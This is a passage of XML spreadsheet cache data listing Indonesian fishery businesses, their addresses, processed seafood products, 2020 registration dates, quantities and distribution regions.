    <s v="Komplek Industri dan Pergudangan Sinar Buduran II Blok A No.40, Kel. Prasung, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Semar, Banjar, Layang, Cakalang, Tetengkek)"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="900000"/>
    <s v="Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21233"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Makerel, Salem, Sarden)"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="19495"/>
    <x v="371"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Lampung Selatan, Kabupaten Lampung Utara, Kota Bandar Lampung, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20459"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Flounder, Halibut, Striped Jack)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="20"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21320"/>
    <x v="167"/>
    <s v="PT. INDONESIA BRAZIL COFFEE"/>
    <s v="Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21386"/>
    <x v="372"/>
    <s v="DAUN SALAM JOGJA"/>
    <s v="Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Sosis Ikan"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4800"/>
    <s v="Kota Jakarta Timur, Kota Cirebon, Kabupaten Cilacap, Kabupaten Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kabupaten Jember, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21378"/>
    <x v="373"/>
    <s v="CV. VICTORY FRIENDCIPLE"/>
    <s v="Jl. Tuna 2 Blok K No. 7B Room C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Salem, Sarden)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="128270"/>
    <s v="Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Indramayu, Kabupaten Bekasi, Kabupaten Pati, Kabupaten Tuban, Kabupaten Pandeglang, Kabupaten Lebak, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21232"/>
    <x v="370"/>
    <s v="PT. MAJU MINA LAUT INDONESIA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21193"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI"/>
    <s v="Pergudangan Margomulyo Permai Blok J- 12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tude, Deho, Terbang, Kembung, Semar, Salem, Tenggiri)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Bangkalan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19903"/>
    <x v="374"/>
    <s v="CV. BENING JATI ANUGRAH"/>
    <s v="Kp. Jati Parung RT 003 RW 004 No. 106, Kel. Parung, Kec. Parung, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Otak-Otak Ikan, Siomay Ikan, Ekado, Keong Mas, Kaki Naga, Lumpia Ikan, Udang Gulung, Pangsit Ikan)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Banda Aceh, Kota Jakarta Selatan, Kota Jakarta Pusat, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Depok, Kota Semarang, Kota Tegal, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="19475"/>
    <x v="375"/>
    <s v="CV. SAMUDRA SENTOSA"/>
    <s v="Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Hiu Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19476"/>
    <x v="375"/>
    <s v="CV. SAMUDRA SENTOSA"/>
    <s v="Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Probolinggo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20563"/>
    <x v="376"/>
    <s v="CV. CINDY GROUP INDONESIA"/>
    <s v="Gedung Olahan Sentra Minapolitan, Jl. H. Usa No.12A, Kel. Ciseeng, Kec. Ciseeng, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bandeng Presto"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="7800"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Karawang, Kota Bogor, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21387"/>
    <x v="372"/>
    <s v="DAUN SALAM JOGJA"/>
    <s v="Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Pepes Bandeng"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4800"/>
    <s v="Kota Jakarta Timur, Kabupaten Cirebon, Kabupaten Cilacap, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19590"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bandung, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="17303"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-Cumi)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="19474"/>
    <x v="375"/>
    <s v="CV. SAMUDRA SENTOSA"/>
    <s v="Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Probolinggo, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19479"/>
    <x v="375"/>
    <s v="CV. SAMUDRA SENTOSA"/>
    <s v="Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Probolinggo, Kota Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20452"/>
    <x v="378"/>
    <s v="UD. BERKAH ADI PUTRA"/>
    <s v="Dusun Punden RT 3 RW 2, Kel. Jeblog, Kec. Talun, Kabupaten Blitar&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan)"/>
    <d v="2020-08-07T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Yogyakarta, Kabupaten Tulungagung, Kabupaten Blitar, Kabupaten Kediri, Kabupaten Malang, Kabupaten Gresik, Kota Kediri, Kota Blitar, Kota Malang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19807"/>
    <x v="63"/>
    <s v="PT. SEKAR BUMI TBK"/>
    <s v="Jl. Millennium Raya Blok L1 No.1 Kawasan Industri Millennium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Bernilai Tambah Beku (Cumi-Cumi Bentuk Cincin Beku, Cumi-Cumi Bentuk Tabung Beku, Kaki Gurita Potong Beku, Gurita Potong Beku)"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="600"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20564"/>
    <x v="376"/>
    <s v="CV. CINDY GROUP INDONESIA"/>
    <s v="Gedung Olahan Sentra Minapolitan, Jl. H. Usa No.12A, Kel. Ciseeng, Kec. Ciseeng, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Pindang Tongkol Suir"/>
    <d v="2020-12-21T00:00:00"/>
    <n v="7800"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bandung, Kota Bogor, Kota Depok, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21382"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Stik Ikan"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="288"/>
    <s v="Kabupaten Purwakarta, Kabupaten Semarang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="21384"/>
    <x v="372"/>
    <s v="DAUN SALAM JOGJA"/>
    <s v="Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Otak-Otak Bandeng"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4800"/>
    <s v="Kota Cirebon, Kabupaten Cilacap, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21385"/>
    <x v="372"/>
    <s v="DAUN SALAM JOGJA"/>
    <s v="Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Pepes Ikan"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4800"/>
    <s v="Kota Cirebon, Kabupaten Cilacap, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19493"/>
    <x v="371"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Makerel, Layang, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19494"/>
    <x v="371"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-02-28T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Lampung Selatan, Kabupaten Lampung Utara, Kabupaten Pringsewu, Kota Bandar Lampung, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21321"/>
    <x v="167"/>
    <s v="PT. INDONESIA BRAZIL COFFEE"/>
    <s v="Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Teri Kaleng"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21226"/>
    <x v="379"/>
    <s v="CV. FIRDALI SEJAHTERA"/>
    <s v="Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Makarel, Salem, Sarden)"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="17300"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Surabaya, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="17302"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Surabaya, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19756"/>
    <x v="380"/>
    <s v="PT, CITRA DIMENSI ARTHALI"/>
    <s v="Perum Prasarana Perikanan Samudera Blok N No,11, Jl, Muara Baru Ujung, Kel, Penjaringan, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Bakso Cumi-cumi, Roll Ikan, Chikuwa, Stik Kepiting Analog) "/>
    <d v="2020-05-08T00:00:00"/>
    <n v="480000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Bandung, Kota Depok, Kota Malang, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21227"/>
    <x v="379"/>
    <s v="CV, FIRDALI SEJAHTERA"/>
    <s v="Jl, Husein Sastranegara No,109 RT 003 RW 010 Room 07, Kel, Benda, Kec, Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Daging Tuna Beku"/>
    <d v="2020-07-03T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19804"/>
    <x v="63"/>
    <s v="PT. SEKAR BUMI TBK"/>
    <s v="Jl. Millennium Raya Blok L1 No.1 Kawasan Industri Millennium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Bakso Cumi-cumi, Bakso Ikan Isi, Roll Ikan, Kue Ikan, Tofu Ikan) "/>
    <d v="2020-02-27T00:00:00"/>
    <n v="2400"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21380"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Otak-Otak Ikan"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="288"/>
    <s v="Kabupaten Purwakarta, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="19553"/>
    <x v="263"/>
    <s v="PT. EXPRAVET NASUBA"/>
    <s v="Jl. K. L. Yos Sudarso KM 8,8 No.88, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21381"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Nugget Ikan"/>
    <d v="2020-08-27T00:00:00"/>
    <n v="288"/>
    <s v="Kabupaten Semarang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="21383"/>
    <x v="271"/>
    <s v="RANAFRA"/>
    <s v="Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bakso Ikan "/>
    <d v="2020-08-27T00:00:00"/>
    <n v="288"/>
    <s v="Kabupaten Semarang, Kabupaten Pekalongan, Kabupaten Pemalang, Kabupaten Tegal, Kabupaten Brebes, Kota Semarang, Kota Pekalongan, Kota Tegal"/>
    <m/>
  </r>
  <r>
    <n v="21388"/>
    <x v="372"/>
    <s v="DAUN SALAM JOGJA"/>
    <s v="Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Otak-Otak Tuna"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="4800"/>
    <s v="Kabupaten Cirebon, Kabupaten Cilacap, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="20071"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Bulu Babi Segar"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="60"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="20073"/>
    <x v="381"/>
    <s v="PT. KUNIMOTO FOODS"/>
    <s v="Ruko Intercon Plaza Blok E No.18 Jl. Meruya Ilir Raya No.14, Kel. Srengseng, Kec. Kembangan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-03-02T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19244"/>
    <x v="382"/>
    <s v="MINA ABADHI FARM"/>
    <s v="Dusun Janten RT 06, Kel. Ngestiharjo, Kec. Kasihan, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Abon Ikan"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="80"/>
    <s v="Kabupaten Klaten, Kota Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="17014"/>
    <x v="383"/>
    <s v="UD. ARSHAINDO"/>
    <s v="Desa Tanggul Rejo RT 13 RW 03, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bandeng Presto, Bandeng Asap, Pepes Bandeng, Otak-otak Bandeng)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="12000"/>
    <s v="Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Mojokerto, Kota Madiun, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19555"/>
    <x v="263"/>
    <s v="PT. EXPRAVET NASUBA"/>
    <s v="Jl. K. L. Yos Sudarso KM 8,8 No.88, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan)"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Deli Serdang, Kabupaten Serdang Bedagai, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai"/>
    <m/>
  </r>
  <r>
    <n v="19793"/>
    <x v="99"/>
    <s v="PT. DHARMA SAMUDERA FISHING INDUSTRIES"/>
    <s v="Jl. Laks. RE. Martadinata I , Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Otak-Otak Ikan, Sosis Ikan, Kaki Naga Egg Roll Ikan)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21136"/>
    <x v="192"/>
    <s v="PT. MINA JAYA LESTARI"/>
    <s v="Pergudangan Margomulyo Permai Blok J- 12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="80000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19260"/>
    <x v="384"/>
    <s v="PT. SHINMAS JAYA BAHARI"/>
    <s v="Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Gerot-gerot, Beloso, Bawal, Merah, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Timur, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya, Kota Makassar"/>
